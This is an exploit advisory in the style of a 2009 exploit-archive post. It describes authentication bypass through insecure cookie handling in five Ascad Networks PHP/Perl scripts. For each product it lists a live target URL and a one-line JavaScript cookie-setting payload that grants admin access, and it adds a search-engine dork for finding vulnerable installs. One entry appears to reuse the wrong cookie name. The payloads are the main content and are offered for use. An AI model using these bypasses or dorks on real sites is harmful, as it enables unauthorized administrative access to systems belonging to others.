[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
# Published : 2009-05-14
# Author : G4N0K
# Previous Title : my-Gesuad 0.9.14 (AB/SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability


==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...FROM IRAN

==============================================================================
	Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
==============================================================================

	[??] Script:.............[ Ascad Networks Scripts ]....................
	[??] Website:............[ http://www.ascadnetworks.com ]..............
	[??] Today:..............[ 1305009 ]...................................
	[??] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......


	
	 [+] c7 Portal <= v1.1.0
	===============================
	
	Live...: http://hatcocorporation.com/c7/

        [0] javascript:document.cookie = "c7portal=admin";
		[1] now navigate to: http://hatcocorporation.com/c7/home/
            esle, you will fall into a loop ;)...

        [1] d0rk: intitle:"c7 Portal by Ascad Networks"

	


	 [+] Password Protector SD v2 (ppSD2)
	===============================
	
	Live...: http://ppsd2008.passwordprotectorsd.com/ppSD2/admin/

        [0] javascript:document.cookie = "c7portal=admin";





	 [+] Form Processor Gold
	===============================
	
	Live...: http://www.ascadnetworks.com/cgi-bin/demos/fp_gold/admin.pl

        [0] javascript:document.cookie = "FormProGold=in";





	 [+] Guestbook Creator v1.5
	===============================
	
	Live...: http://www.ascadnetworks.com/cgi-bin/demos/gb/admin.pl

        [0] javascript:document.cookie = "ascadnetworks_gbook_admin=in";





	 [+] Mini Forum v1.0.1
	===============================
	
	Live...: http://www.ascadnetworks.com/cgi-bin/demos/mf/admin.pl

        [0] javascript:document.cookie = "admf=admin";




	 [+] Greetz
	===================================
	[??] ALLAH
	[??] MSD, AMD, AFN, SMN...
	[??] Hussain-X, JiKo, Sakab(!)...

# www.Syue.com [2009-05-14]